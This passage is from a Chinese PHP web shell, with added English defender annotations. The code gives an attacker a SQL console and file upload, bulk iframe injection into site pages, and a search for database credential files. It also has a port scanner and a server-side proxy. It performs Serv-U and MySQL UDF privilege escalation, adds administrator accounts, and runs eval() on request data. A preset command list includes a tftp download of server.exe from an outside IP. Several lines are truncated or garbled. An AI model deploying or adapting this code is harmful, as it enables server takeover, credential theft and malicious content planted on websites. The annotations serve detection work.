else{$_SESSION['sql_port'] = '3306';}
if($_SESSION['sql_user'] && $_SESSION['sql_password']){
if(!($sqlcon = @mysql_connect($_SESSION['sql_host'].':'.$_SESSION['sql_port'],$_SESSION['sql_user'],$_SESSION['sql_password']))){
unset($_SESSION['sql_user'], $_SESSION['sql_password'], $_SESSION['sql_host'], $_SESSION['sql_port']);
die(html_a('?eanver=sqlshell','连接失败请返回'));
die(html_a('?eanver=sqlshell','连接失败请返回'));
$query = mysql_query("SHOW DATABASES",$sqlcon);
html_n('&tr&&td&数据库列表:');
while($db = mysql_fetch_array($query)) {
html_a('?eanver=issql&db='.$db['Database'],$db['Database']);
echo '&&';
html_n('&/td&&/tr&');
if($_GET['db']){
css_js("3");
mysql_select_db($_GET['db'], $sqlcon);
html_n('&tr&&td&&form method="POST" name="DbForm"&&textarea name="sql" COLS="80" ROWS="3"&'.$_POST['sql'].'&/textarea&&br&');
html_select(array(0=&"--SQL语法--",7=&"添加数据",8=&"删除数据",9=&"修改数据",10=&"建数据表",11=&"删数据表",12=&"添加字段",13=&"删除字段"),0,"onchange='return Full(options[selectedIndex].value)'");
html_input("submit","doquery","执行");
html_a("?eanver=issql&db=".$_GET['db'],$_GET['db']);
html_n('---&');
html_a("?eanver=issql&db=".$_GET['db']."&table=".$_GET['table'],$_GET['table']);
html_n('&/form&&br&');
if(!empty($_POST['sql'])){
if (@mysql_query($_POST['sql'],$sqlcon)) {
echo "执行SQL语句成功";
echo "出错: ".mysql_error();
if($_GET['table']){
html_n('&table border=1&&tr&');
$query = "SHOW COLUMNS FROM ".$_GET['table'];
$result = mysql_query($query,$sqlcon);
$fields = array();
while($row = mysql_fetch_assoc($result)){
array_push($fields,$row['Field']);
html_n('&td&&font color=#FFFF44&'.$row['Field'].'&/font&&/td&');
html_n('&/tr&&tr&');
$result = mysql_query("SELECT * FROM ".$_GET['table'],$sqlcon) or die(mysql_error());
while($text = @mysql_fetch_assoc($result)){
foreach($fields as $row){
if($text[$row] == "") $text[$row] = 'NULL';
html_n('&td&'.$text[$row].'&/td&');
echo '&/tr&';
$query = "SHOW TABLES FROM " . $_GET['db'];
$dat = mysql_query($query, $sqlcon) or die(mysql_error());
while ($row = mysql_fetch_row($dat)){
html_n("&tr&&td&&a href='?eanver=issql&db=".$_GET['db']."&table=".$row[0]."'&".$row[0]."&/a&&/td&&/tr&");
case "upfiles":
html_n('&tr&&td&服务器限制上传单个文件大小: '.@get_cfg_var('upload_max_filesize').'&form method="POST" enctype="multipart/form-data"&');
html_input("text","uppath",root_dir,"&br&上传到路径: ","51");
print&&&END
&SCRIPT language="JavaScript"&
function addTank(){
k=tank.rows.
newRow=document.all.tank.insertRow(-1)
&!--删除选择--&
newcell=newRow.insertCell()
newcell.innerHTML="&input name='tankNo' type='checkbox'& &input type='file' name='upfile[]' value='' size='50'&"
function delTank() {
if(tank.rows.length==1)
var checkit =
for (var i=0;i&document.all.tankNo.i++) {
if (document.all.tankNo[i].checked) {
tank.deleteRow(i+1);
if (checkit) {
alert("请选择一个要删除的对象");
&table cellSpacing=0 cellPadding=0 width="100%" border=0&
&td width="7%"&&input class="button01" type="button"
onclick="addTank()" value=" 添 加 " name="button2"/&
&input name="button3"
type="button" class="button01" onClick="delTank()" value="删除" /&
id="tank" width="100%" border="0" cellpadding="1" cellspacing="1" &
&tr&&td&请选择要上传的文件:&/td&&/tr&
&tr&&td&&input name='tankNo' type='checkbox'& &input type='file' name='upfile[]' value='' size='50'&&/td&&/tr&
html_n('&br&&input type="submit" name="upfiles" value="上传" style="width:80"& &input type="button" value="返回" onclick="window.location=\'?eanver=main&path='.root_dir.'\';" style="width:80"&');
if($_POST['upfiles']){
foreach ($_FILES["upfile"]["error"] as $key =& $error){
if ($error == UPLOAD_ERR_OK){
$tmp_name = $_FILES["upfile"]["tmp_name"][$key];
$name = $_FILES["upfile"]["name"][$key];
$uploadfile = str_path($_POST['uppath'].'/'.$name);
$upload = @copy($tmp_name,$uploadfile) ? $name.$msg[2] : @move_uploaded_file($tmp_name,$uploadfile) ? $name.$msg[2] : $name.$msg[3];
echo '&br&&br&'.$
html_n('&/form&');
// Defender annotation: bulk content injection / removal across a directory.
// The form takes a path, a "|"-separated list of file extensions or names, and
// a code snippet; the radio buttons submit "guama" (insert) or "qingma"
// (remove). The work is done by do_passreturn(), defined outside the visible
// lines. The default snippet is a 1x1 iframe.
// Detection: the same hidden iframe or script tag appearing across many pages,
// and mass modification times on static content. File-integrity monitoring and
// read-only deployment of web content limit the impact.
case "guama":
// NOTE(review): the default value on the next line is truncated in this copy.
$patht = isset($_POST['path']) ? $_POST['path'] : root_
$typet = isset($_POST['type']) ? $_POST['type'] : ".html|.shtml|.htm|.asp|.php|.jsp|.cgi|.aspx";
$codet = isset($_POST['code']) ? $_POST['code'] : "&iframe src=\"http://localhost/eanver.htm\" width=\"1\" height=\"1\"&&/iframe&";
html_n('&tr&&td&文件类型请用"|"隔开,也可以是指定文件名.&form method="POST"&&br&');
html_input("text","path",$patht,"路径范围","45");
html_input("checkbox","pass","","使用目录遍历","",true);
html_input("text","type",$typet,"&br&&br&文件类型","60");
html_text("code","67","5",$codet);
html_n('&br&&br&');
html_radio("批量挂马","批量清马","guama","qingma");
html_input("submit","passreturn","开始");
html_n('&/td&&/tr&&/form&');
if(!empty($_POST['path'])){
html_n('&tr&&td&目标文件:&br&&br&');
// NOTE(review): both assigned values are missing from the next line in this copy;
// the checkbox label suggests the flag toggles directory recursion. Confirm.
if(isset($_POST['pass'])) $bool = else $bool =
do_passreturn($patht,$codet,$_POST['return'],$bool,$typet);
// Defender annotation: bulk search-and-replace of file contents under a
// request-supplied path. `newcode` and `oldcode` are passed to do_passreturn()
// (defined outside the visible lines) with the mode string "tihuan".
// Like the injection handler, it shows up as many files changing at once;
// file-integrity monitoring on the web root is the relevant control.
case "tihuan":
html_n('&tr&&td&此功能可批量替换文件内容,请小心使用.&br&&br&&form method="POST"&');
html_input("text","path",root_dir,"路径范围","45");
html_input("checkbox","pass","","使用目录遍历","",true);
html_text("newcode","67","5",$_POST['newcode']);
html_n('&br&&br&替换为');
html_text("oldcode","67","5",$_POST['oldcode']);
html_input("submit","passreturn","替换","&br&&br&");
html_n('&/td&&/tr&&/form&');
if(!empty($_POST['path'])){
html_n('&tr&&td&目标文件:&br&&br&');
// NOTE(review): both assigned values are missing from the next line in this copy.
if(isset($_POST['pass'])) $bool = else $bool =
do_passreturn($_POST['path'],$_POST['newcode'],"tihuan",$bool,$_POST['oldcode']);
// Defender annotation: file search by name or by contained text under a
// request-supplied path. The on-page help text states the purpose: locating
// configuration files that store MySQL credentials. The preset list names
// common PHP applications (Discuz, PHPWind, phpcms, dedecms, PHPBB, wordpress,
// sa-blog, o-blog).
// Mitigation: keep database credentials in files the web-server account can
// read only where required, use per-application database accounts with minimal
// privileges, and rotate credentials after any web-shell finding.
case "scanfile":
css_js("4");
html_n('&tr&&td&此功能可很方便的搜索到保存MYSQL用户密码的配置文件,用于提权.&br&当服务器文件太多时,会影响执行速度,不建议使用目录遍历.&form method="POST" name="sform"&&br&');
html_input("text","path",root_dir,"路径名","45");
html_input("checkbox","pass","","使用目录遍历","",true);
html_input("text","code",$_POST['code'],"&br&&br&关键字","40");
html_select(array("--MYSQL配置文件--","Discuz","PHPWind","phpcms","dedecms","PHPBB","wordpress","sa-blog","o-blog"),0,"onchange='return Fulll(options[selectedIndex].value)'");
html_n('&br&&br&');
// The radio buttons submit "scanfile" (match file names) or "scancode" (match content).
html_radio("搜索文件名","搜索包含文字","scanfile","scancode");
html_input("submit","passreturn","搜索");
html_n('&/td&&/tr&&/form&');
if(!empty($_POST['path'])){
html_n('&tr&&td&找到文件:&br&&br&');
// NOTE(review): both assigned values are missing from the next line in this copy.
if(isset($_POST['pass'])) $bool = else $bool =
do_passreturn($_POST['path'],$_POST['code'],$_POST['return'],$bool);
// Defender annotation: signature-based search for other web shells under a
// request-supplied path, selectable per script type (php/asp/aspx/jsp). The
// on-page text says matches are signature-driven and should be reviewed before
// deletion. The signatures themselves live in do_passreturn(), outside the
// visible lines.
case "scanphp":
html_n('&tr&&td&原理是根据特征码定义的,请查看代码判断后再进行删除.&form method="POST"&&br&');
html_input("text","path",root_dir,"查找范围","40");
html_input("checkbox","pass","","使用目录遍历&br&&br&脚本类型","",true);
html_select(array("php" =& "PHP","asp" =& "ASP","aspx" =& "ASPX","jsp" =& "JSP"));
html_input("submit","passreturn","查找","&br&&br&");
html_n('&/td&&/tr&&/form&');
if(!empty($_POST['path'])){
html_n('&tr&&td&找到文件:&br&&br&');
// NOTE(review): both assigned values are missing from the next line in this copy.
if(isset($_POST['pass'])) $bool = else $bool =
do_passreturn($_POST['path'],$_POST['class'],"scanphp",$bool);
// Defender annotation: TCP connect scan launched from the web server.
// The POSTed port list is split on "|" and each port is tried with fsockopen()
// using a 2-second timeout; a successful connect is reported as open.
// Because the connections originate from the server, internal hosts that trust
// it are reachable. Detection: bursts of short-lived outbound or east-west
// connection attempts from the web-server process to many ports.
// Mitigation: network segmentation and egress rules for web-tier hosts.
case "port":
$Port_ip = isset($_POST['ip']) ? $_POST['ip'] : '127.0.0.1';
$Port_port = isset($_POST['port']) ? $_POST['port'] : '21|23|25|80|110|135|139|445|89|';
print&&&END
&form method="POST"&
&div class="actall"&扫描IP &input type="text" name="ip" value="{$Port_ip}" style="width:600"& &/div&
&div class="actall"&端口号 &input type="text" name="port" value="{$Port_port}" style="width:597"&&/div&
&div class="actall"&&input type="submit" value="扫描" style="width:80"&&/div&
if((!empty($_POST['ip'])) && (!empty($_POST['port'])))
echo '&div class="actall"&';
$ports = explode('|', $_POST['port']);
for($i = 0;$i & count($ports);$i++)
$fp = @fsockopen($_POST['ip'],$ports[$i],$errno,$errstr,2);
echo $fp ? '&font color="#FF0000"&开放端口 ---& '.$ports[$i].'&/font&&br&' : '关闭端口 ---& '.$ports[$i].'&br&';
// Output is flushed after each probe so results appear progressively.
ob_flush();
echo '&/div&';
// Defender annotation: simple server-side HTTP proxy. A POSTed URL is fetched
// with file_get_contents() and the response body is echoed back unmodified.
// The on-page text notes that the fetched site logs the server's address, not
// the operator's. From a defender's view this is a request-forgery primitive:
// the server can be made to reach internal-only endpoints.
// Detection: outbound requests from the PHP process to unexpected hosts.
// Mitigation: allow_url_fopen=Off and egress filtering on the web tier.
case "getcode":
if (isset($_POST['url'])) {$proxycontents = @file_get_contents($_POST['url']);echo ($proxycontents) ? $proxycontents : "&body bgcolor=\"#F5F5F5\" style=\"font-size: 12\"&&center&&br&&p&&b&获取 URL 内容失败&/b&&/p&&/center&&/body&";}
print&&&END
&table width="100%" border="0" cellpadding="3" cellspacing="1" bgcolor="#ffffff"&
&form method="POST" target="proxyframe"&
&tr class="firstalt"&
&td align="center"&&b&在线代理&/b&&/td&
&tr class="secondalt"&
&td align="center"
&&br&&ul&&li&用本功能仅实现简单的 HTTP 代理,不会显示使用相对路径的图片、链接及CSS样式表.&/li&&li&用本功能可以通过本服务器浏览目标URL,但不支持 SQL Injection 探测以及某些特殊字符.&/li&&li&用本功能浏览的 URL,在目标主机上留下的IP记录是 : {$_SERVER['SERVER_NAME']}&/li&&/ul&&/td&
&tr class="firstalt"&
&td align="center" height=40
&URL: &input name="url" value="about:blank" type="text"
class="input" size="100" &
&input name="" value="浏览" type="submit"
class="input" size="30" &
&tr class="secondalt"&
&td align="center"
&&iframe name="proxyframe" frameborder="0" width="765" height="400" marginheight="0" marginwidth="0" scrolling="auto" src="about:blank"&&/iframe&&/td&
&/form&&/table&
// Defender annotation: local privilege escalation through a Serv-U FTP
// administration port. The handler connects to 127.0.0.1 on the POSTed port
// (form default 43958), logs in with the POSTed account (the form pre-fills an
// account name and password), sends SITE MAINTENANCE, and then pushes a domain
// definition and a user definition. If a command is supplied it logs in to
// port 21 as that new user and issues `site exec`, then deletes the domain.
// The whole path depends on the local administration account still using the
// pre-filled credentials and on the FTP service running with high privileges.
// Mitigation: change or disable the local administration credentials, keep
// Serv-U patched, run the service under a low-privilege account, and firewall
// the administration port even on loopback where the platform allows it.
// Detection: loopback connections from the web-server process to the admin
// port, unexpected FTP domains/users, new local accounts or administrators-group
// changes in the Windows security log.
case "servu":
$SUPass = isset($_POST['SUPass']) ? $_POST['SUPass'] : '#l@$ak#.0@P';
print&&&END
&div class="actall"&&a href="?eanver=servu"&[执行命令]&/a& &a href="?eanver=servu&o=adduser"&[添加用户]&/a&&/div&
&form method="POST"&
&div class="actall"&ServU端口 &input name="SUPort" type="text" value="43958" style="width:300px"&&/div&
&div class="actall"&ServU用户 &input name="SUUser" type="text" value="LocalAdministrator" style="width:300px"&&/div&
&div class="actall"&ServU密码 &input name="SUPass" type="text" value="{$SUPass}" style="width:300px"&&/div&
if($_GET['o'] == 'adduser')
print&&&END
&div class="actall"&帐号 &input name="user" type="text" value="envl" style="width:200px"&
密码 &input name="password" type="text" value="envl" style="width:200px"&
目录 &input name="part" type="text" value="C:\\\\" style="width:200px"&&/div&
print&&&END
&div class="actall"&提权命令 &input name="SUCommand" type="text" value="net user envl envl /add & net localgroup administrators envl /add" style="width:600px"&&br&
&input name="user" type="hidden" value="envl"&
&input name="password" type="hidden" value="envl"&
&input name="part" type="hidden" value="C:\\\\"&&/div&
echo '&div class="actall"&&input type="submit" value="执行" style="width:80"&&/div&&/form&';
if((!empty($_POST['SUPort'])) && (!empty($_POST['SUUser'])) && (!empty($_POST['SUPass'])))
echo '&div class="actall"&';
$sendbuf = "";
$recvbuf = "";
// NOTE(review): the variable name on the left of the next assignment is missing
// in this copy, as are the right-hand sides of several `$sendbuf = $` lines below.
= "-SETDOMAIN\r\n"."-Domain=haxorcitos|0.0.0.0|21|-1|1|0\r\n"."-TZOEnable=0\r\n"." TZOKey=\r\n";
$adduser = "-SETUSERSETUP\r\n"."-IP=0.0.0.0\r\n"."-PortNo=21\r\n"."-User=".$_POST['user']."\r\n"."-Password=".$_POST['password']."\r\n"."-HomeDir=c:\\\r\n"."-LoginMesFile=\r\n"."-Disable=0\r\n"."-RelPaths=1\r\n"."-NeedSecure=0\r\n"."-HideHidden=0\r\n"."-AlwaysAllowLogin=0\r\n"."-ChangePassword=0\r\n".
"-QuotaEnable=0\r\n"."-MaxUsersLoginPerIP=-1\r\n"."-SpeedLimitUp=0\r\n"."-SpeedLimitDown=0\r\n"."-MaxNrUsers=-1\r\n"."-IdleTimeOut=600\r\n"."-SessionTimeOut=-1\r\n"."-Expire=0\r\n"."-RatioUp=1\r\n"."-RatioDown=1\r\n"."-RatiosCredit=0\r\n"."-QuotaCurrent=0\r\n"."-QuotaMaximum=0\r\n".
"-Maintenance=None\r\n"."-PasswordType=Regular\r\n"."-Ratios=None\r\n"." Access=".$_POST['part']."\|RWAMELCDP\r\n";
$deldomain = "-DELETEDOMAIN\r\n"."-IP=0.0.0.0\r\n"." PortNo=21\r\n";
// Session with the local administration port; every request and reply is
// echoed into the page.
$sock = @fsockopen("127.0.0.1", $_POST["SUPort"],$errno,$errstr, 10);
$recvbuf = @fgets($sock, 1024);
echo "返回数据包: $recvbuf &br&";
$sendbuf = "USER ".$_POST["SUUser"]."\r\n";
@fputs($sock, $sendbuf, strlen($sendbuf));
echo "发送数据包: $sendbuf &br&";
$recvbuf = @fgets($sock, 1024);
echo "返回数据包: $recvbuf &br&";
$sendbuf = "PASS ".$_POST["SUPass"]."\r\n";
@fputs($sock, $sendbuf, strlen($sendbuf));
echo "发送数据包: $sendbuf &br&";
$recvbuf = @fgets($sock, 1024);
echo "返回数据包: $recvbuf &br&";
$sendbuf = "SITE MAINTENANCE\r\n";
@fputs($sock, $sendbuf, strlen($sendbuf));
echo "发送数据包: $sendbuf &br&";
$recvbuf = @fgets($sock, 1024);
echo "返回数据包: $recvbuf &br&";
$sendbuf = $
@fputs($sock, $sendbuf, strlen($sendbuf));
echo "发送数据包: $sendbuf &br&";
$recvbuf = @fgets($sock, 1024);
echo "返回数据包: $recvbuf &br&";
$sendbuf = $
@fputs($sock, $sendbuf, strlen($sendbuf));
echo "发送数据包: $sendbuf &br&";
$recvbuf = @fgets($sock, 1024);
echo "返回数据包: $recvbuf &br&";
if(!empty($_POST['SUCommand']))
// Second session, to the FTP port itself, as the user created above.
$exp = @fsockopen("127.0.0.1", "21",$errno,$errstr, 10);
$recvbuf = @fgets($exp, 1024);
echo "返回数据包: $recvbuf &br&";
$sendbuf = "USER ".$_POST['user']."\r\n";
@fputs($exp, $sendbuf, strlen($sendbuf));
echo "发送数据包: $sendbuf &br&";
$recvbuf = @fgets($exp, 1024);
echo "返回数据包: $recvbuf &br&";
$sendbuf = "PASS ".$_POST['password']."\r\n";
@fputs($exp, $sendbuf, strlen($sendbuf));
echo "发送数据包: $sendbuf &br&";
$recvbuf = @fgets($exp, 1024);
echo "返回数据包: $recvbuf &br&";
$sendbuf = "site exec ".$_POST["SUCommand"]."\r\n";
@fputs($exp, $sendbuf, strlen($sendbuf));
echo "发送数据包: site exec &font color=#006600&".$_POST["SUCommand"]."&/font& &br&";
$recvbuf = @fgets($exp, 1024);
echo "返回数据包: $recvbuf &br&";
$sendbuf = $
@fputs($sock, $sendbuf, strlen($sendbuf));
echo "发送数据包: $sendbuf &br&";
$recvbuf = @fgets($sock, 1024);
echo "返回数据包: $recvbuf &br&";
@fclose($exp);
@fclose($sock);
echo '&/div&';
// Panel action "eval": shows a textarea pre-filled with the POSTed `phpcode` value
// (default "phpinfo();") and, when the `eval` submit field is non-empty, hands that
// value to eval() after stripslashes(). The request body is executed as PHP with the
// privileges of the web-server process.
// NOTE(review): closing braces and the end of this case are missing from the listing
// (extraction damage), so the exact control flow cannot be confirmed from here.
// Detection: POST requests carrying both `phpcode` and `eval` fields; eval() applied to
// request data is a strong static signature for code scanners and file-integrity review.
case "eval":
$phpcode = isset($_POST['phpcode']) ? $_POST['phpcode'] : "phpinfo();";
html_n('&tr&&td&&form method="POST"&不用写&? ?&标签');
html_text("phpcode","70","15",$phpcode);
html_input("submit","eval","执行","&br&&br&");
if(!empty($_POST['eval'])){
echo "&br&&br&";
// Request-controlled string executed as code; nothing validates or restricts it.
eval(stripslashes($phpcode));
html_n('&/form&');
// Panel action "myexp": abuse of MySQL user-defined functions (UDF) on a Windows host.
// Using POSTed connection details, the visible statements create a scratch table, insert
// a blob returned by Mysql_shellcode() (defined outside this block), write it to $mpath
// with SELECT ... INTO DUMPFILE, register it with CREATE FUNCTION ... SONAME, and then
// pass $sqlcmd to the resulting function `state`.
// NOTE(review): braces are missing in this listing, so the nesting is inferred from the
// order of the if/else lines -- treat the structure as approximate.
// Artifacts to hunt for: a table named Envl_Temp_Tab, a UDF named `state` (registered
// UDFs are listed in mysql.func), and an unexpected DLL such as the default path below.
// Hardening: set secure_file_priv, keep the FILE privilege and root credentials away from
// web applications, and run mysqld under a low-privilege service account.
// The mysql_* API used here was removed in PHP 7.0, so this code only runs on PHP 5.x.
case "myexp":
$MSG_BOX = '请先导出DLL,再执行命令.MYSQL用户必须为root权限,导出路径必须能加载DLL文件.';
$info = '命令回显';
// Form defaults; overwritten from POST data two lines below.
$mhost = 'localhost'; $muser = 'root'; $mport = '3306'; $mpass = ''; $mdata = 'mysql'; $mpath = 'C:/windows/mysqlDll.dll'; $sqlcmd = 'ver';
if(isset($_POST['mhost']) && isset($_POST['muser']))
// Only mpath is normalised (File_Str converts backslashes and double slashes); the rest is used as received.
$mhost = $_POST['mhost']; $muser = $_POST['muser']; $mpass = $_POST['mpass']; $mdata = $_POST['mdata']; $mport = $_POST['mport']; $mpath = File_Str($_POST['mpath']); $sqlcmd = $_POST['sqlcmd'];
$conn = mysql_connect($mhost.':'.$mport,$muser,$mpass);
@mysql_select_db($mdata);
if((!empty($_POST['outdll'])) && (!empty($_POST['mpath'])))
$query = "CREATE TABLE Envl_Temp_Tab (envl BLOB);";
if(@mysql_query($query,$conn))
$shellcode = Mysql_shellcode();
$query = "INSERT into Envl_Temp_Tab values (CONVERT(".$shellcode.",CHAR));";
if(@mysql_query($query,$conn))
// $mpath is concatenated into the statement text without escaping.
$query = 'SELECT envl FROM Envl_Temp_Tab INTO DUMPFILE \''.$mpath.'\';';
if(@mysql_query($query,$conn))
// The SONAME argument is the last path component of $mpath.
$ap = explode('/', $mpath); $inpath = array_pop($ap);
$query = 'Create Function state returns string soname \''.$inpath.'\';';
$MSG_BOX = @mysql_query($query,$conn) ? '安装DLL成功' : '安装DLL失败';
else $MSG_BOX = '导出DLL文件失败';
else $MSG_BOX = '写入临时表失败';
// NOTE(review): this drops Envl_Temp_T, not the Envl_Temp_Tab created above. If that is
// not extraction damage, the scratch table is left behind and serves as a forensic artifact.
@mysql_query('DROP TABLE Envl_Temp_T',$conn);
else $MSG_BOX = '创建临时表失败';
if(!empty($_POST['runcmd']))
// $sqlcmd is concatenated into the query text without escaping.
$query = 'select state("'.$sqlcmd.'");';
$result = @mysql_query($query,$conn);
if($result)
// NOTE(review): rows are appended to $infotmp while $info is reset to NULL; the statement
// that would copy one into the other is not visible in this listing.
$k = 0; $info = NULL;
while($row = @mysql_fetch_array($result)){$infotmp .= $row[$k];$k++;}
$MSG_BOX = '执行成功';
else $MSG_BOX = '执行失败';
else $MSG_BOX = '连接MYSQL失败';
print&&&END
&script language="javascript"&
function Fullm(i){
Str = new Array(11);
Str[0] = "ver";
Str[1] = "net user envl envl /add";
Str[2] = "net localgroup administrators envl /add";
Str[3] = "net start Terminal Services";
Str[4] = "tasklist /svc";
Str[5] = "netstat -ano";
Str[6] = "ipconfig";
Str[7] = "net user guest /active:yes";
Str[8] = "copy c:\\\\1.php d:\\\\2.php";
Str[9] = "tftp -i 219.134.46.245 get server.exe c:\\\\server.exe";
Str[10] = "net start telnet";
Str[11] = "shutdown -r -t 0";
mform.sqlcmd.value = Str[i];
&form id="mform" method="POST"&
&div id="msgbox" class="msgbox"&{$MSG_BOX}&/div&
&center&&div class="actall"&
地址 &input type="text" name="mhost" value="{$mhost}" style="width:110px"&
端口 &input type="text" name="mport" value="{$mport}" style="width:110px"&
用户 &input type="text" name="muser" value="{$muser}" style="width:110px"&
密码 &input type="text" name="mpass" value="{$mpass}" style="width:110px"&
库名 &input type="text" name="mdata" value="{$mdata}" style="width:110px"&
&/div&&div class="actall"&
可加载路径 &input type="text" name="mpath" value="{$mpath}" style="width:555px"&
&input type="submit" name="outdll" value="安装DLL" style="width:80"&&/div&
&div class="actall"&安装成功后可用 &br&&input type="text" name="sqlcmd" value="{$sqlcmd}" style="width:515"&
&select onchange="return Fullm(options[selectedIndex].value)"&
&option value="0" selected&--命令集合--&/option&
&option value="1"&添加管理员&/option&
&option value="2"&设为管理组&/option&
&option value="3"&开启远程桌面&/option&
&option value="4"&查看进程和PID&/option&
&option value="5"&查看端口和PID&/option&
&option value="6"&查看IP&/option&
&option value="7"&激活guest帐户&/option&
&option value="8"&复制文件&/option&
&option value="9"&ftp下载&/option&
&option value="10"&开启telnet&/option&
&option value="11"&重启&/option&
&input type="submit" name="runcmd" value="执行" style="width:80"&
&textarea style="width:720height:300"&{$info}&/textarea&
&/div&&/center&
// Panel action "mysql_exec": when mysql_connect() succeeds with the POSTed host, port,
// user and password, all four values are stored in cookies valid for 24 hours and the
// browser is redirected to ?eanver=mysql_msg.
// Defender note: the database password is kept in clear text in the cookie jar and in any
// proxy or WAF log that records Cookie headers; the cookie names m_eanverhost,
// m_eanverport, m_eanveruser and m_eanverpass are usable as request signatures.
// NOTE(review): braces are missing in this listing (extraction damage).
case "mysql_exec":
if(isset($_POST['mhost']) && isset($_POST['mport']) && isset($_POST['muser']) && isset($_POST['mpass']))
if(@mysql_connect($_POST['mhost'].':'.$_POST['mport'],$_POST['muser'],$_POST['mpass']))
$cookietime = time() + 24 * 3600;
// setcookie() is called with name, value and expiry only -- no path, Secure or HttpOnly arguments.
setcookie('m_eanverhost',$_POST['mhost'],$cookietime);
setcookie('m_eanverport',$_POST['mport'],$cookietime);
setcookie('m_eanveruser',$_POST['muser'],$cookietime);
setcookie('m_eanverpass',$_POST['mpass'],$cookietime);
die('正在登陆,请稍候...&meta http-equiv="refresh" content="0;URL=?eanver=mysql_msg"&');
print&&&END
&form method="POST" name="oform" id="oform"&
&div class="actall"&地址 &input type="text" name="mhost" value="localhost" style="width:300px"&&/div&
&div class="actall"&端口 &input type="text" name="mport" value="3306" style="width:300px"&&/div&
&div class="actall"&用户 &input type="text" name="muser" value="root" style="width:300px"&&/div&
&div class="actall"&密码 &input type="text" name="mpass" value="" style="width:300px"&&/div&
&div class="actall"&&input type="submit" value="登陆" style="width:80"& &input type="button" value="COOKIE" style="width:80" onclick="window.location='?eanver=mysql_msg';"&&/div&
case "mysql_msg":
$conn = @mysql_connect($_COOKIE['m_eanverhost'].':'.$_COOKIE['m_eanverport'],$_COOKIE['m_eanveruser'],$_COOKIE['m_eanverpass']);
print&&&END
&script language="javascript"&
function Delok(msg,gourl)
smsg = "确定要删除[" + unescape(msg) + "]吗?";
if(confirm(smsg)){window.location =}
function Createok(ac)
if(ac == 'a') document.getElementById('nsql').value = 'CREATE TABLE name (eanver BLOB);';
if(ac == 'b') document.getElementById('nsql').value = 'CREATE DATABASE';
if(ac == 'c') document.getElementById('nsql').value = 'DROP DATABASE';
$MSG_BOX = '用户:'.$_COOKIE['m_eanveruser'].' &&&& 地址:'.$_COOKIE['m_eanverhost'].':'.$_COOKIE['m_eanverport'].' &&&& 版本:';
$result = @mysql_query('select version();',$conn);
while($row = @mysql_fetch_array($result)){$MSG_BOX .= $row[$k];$k++;}
echo '&div class="actall"& 数据库:';
$result = mysql_query("SHOW DATABASES",$conn);
while($db = mysql_fetch_array($result)){echo '&&[&a href="?eanver=mysql_msg&db='.$db['Database'].'"&'.$db['Database'].'&/a&]';}
echo '&/div&';
if(isset($_GET['db']))
mysql_select_db($_GET['db'],$conn);
if(!empty($_POST['nsql'])){$BOOL = $MSG_BOX = mysql_query($_POST['nsql'],$conn) ? '执行成功' : '执行失败 '.mysql_error();}
if(is_array($_POST['insql']))
$query = 'INSERT INTO '.$_GET['table'].' (';
foreach($_POST['insql'] as $var =& $key)
$querya .= $var.',';
$queryb .= '\''.addslashes($key).'\',';
$query = $query.substr($querya, 0, -1).') VALUES ('.substr($queryb, 0, -1).');';
$MSG_BOX = mysql_query($query,$conn) ? '添加成功' : '添加失败 '.mysql_error();
if(is_array($_POST['upsql']))
$query = 'UPDATE '.$_GET['table'].' SET ';
foreach($_POST['upsql'] as $var =& $key)
$queryb .= $var.'=\''.addslashes($key).'\',';
$query = $query.substr($queryb, 0, -1).' '.base64_decode($_POST['wherevar']).';';
$MSG_BOX = mysql_query($query,$conn) ? '修改成功' : '修改失败 '.mysql_error();
if(isset($_GET['del']))
$result = mysql_query('SELECT * FROM '.$_GET['table'].' LIMIT '.$_GET['del'].', 1;',$conn);
$good = mysql_fetch_assoc($result);
$query = 'DELETE FROM '.$_GET['table'].' WHERE ';
foreach($good as $var =& $key){$queryc .= $var.'=\''.addslashes($key).'\' AND ';}
$where = $query.substr($queryc, 0, -4).';';
$MSG_BOX = mysql_query($where,$conn) ? '删除成功' : '删除失败 '.mysql_error();
$action = '?eanver=mysql_msg&db='.$_GET['db'];
if(isset($_GET['drop'])){$query = 'Drop TABLE IF EXISTS '.$_GET['drop'].';';$MSG_BOX = mysql_query($query,$conn) ? '删除成功' : '删除失败 '.mysql_error();}
if(isset($_GET['table'])){$action .= '&table='.$_GET['table'];if(isset($_GET['edit'])) $action .= '&edit='.$_GET['edit'];}
if(isset($_GET['insert'])) $action .= '&insert='.$_GET['insert'];
echo '&div class="actall"&&form method="POST" action="'.$action.'"&';
echo '&textarea name="nsql" id="nsql" style="width:500height:50"&'.$_POST['nsql'].'&/textarea& ';
echo '&input type="submit" name="querysql" value="执行" style="width:60height:49"& ';
echo '&input type="button" value="创建表" style="width:60height:49" onclick="Createok(\'a\')"& ';
echo '&input type="button" value="创建库" style="width:60height:49" onclick="Createok(\'b\')"& ';
echo '&input type="button" value="删除库" style="width:60height:49" onclick="Createok(\'c\')"&&/form&&/div&';
echo '&div class="msgbox" style="height:40"&'.$MSG_BOX.'&/div&&div class="actall"&&a href="?eanver=mysql_msg&db='.$_GET['db'].'"&'.$_GET['db'].'&/a& ---& ';
if(isset($_GET['table']))
echo '&a href="?eanver=mysql_msg&db='.$_GET['db'].'&table='.$_GET['table'].'"&'.$_GET['table'].'&/a& ';
echo '[&a href="?eanver=mysql_msg&db='.$_GET['db'].'&insert='.$_GET['table'].'"&插入&/a&]&/div&';
if(isset($_GET['edit']))
if(isset($_GET['p'])) $atable = $_GET['table'].'&p='.$_GET['p']; else $atable = $_GET['table'];
echo '&form method="POST" action="?eanver=mysql_msg&db='.$_GET['db'].'&table='.$atable.'"&';
$result = mysql_query('SELECT * FROM '.$_GET['table'].' LIMIT '.$_GET['edit'].', 1;',$conn);
$good = mysql_fetch_assoc($result);
foreach($good as $var =& $key)
$queryc .= $var.'=\''.$key.'\' AND ';
$type = @mysql_field_type($result, $u);
$len = @mysql_field_len($result, $u);
echo '&div class="actall"&'.$var.' &font color="#FF0000"&'.$type.'('.$len.')&/font&&br&&textarea name="upsql['.$var.']" style="width:600height:60"&'.htmlspecialchars($key).'&/textarea&&/div&';
$where = 'WHERE '.substr($queryc, 0, -4);
echo '&input type="hidden" id="wherevar" name="wherevar" value="'.base64_encode($where).'"&';
echo '&div class="actall"&&input type="submit" value="Update" style="width:80"&&/div&&/form&';
$query = 'SHOW COLUMNS FROM '.$_GET['table'];
$result = mysql_query($query,$conn);
$fields = array();
$pagesize=20;
$row_num = mysql_num_rows(mysql_query('SELECT * FROM '.$_GET['table'],$conn));
$numrows=$row_
$pages=intval($numrows/$pagesize);
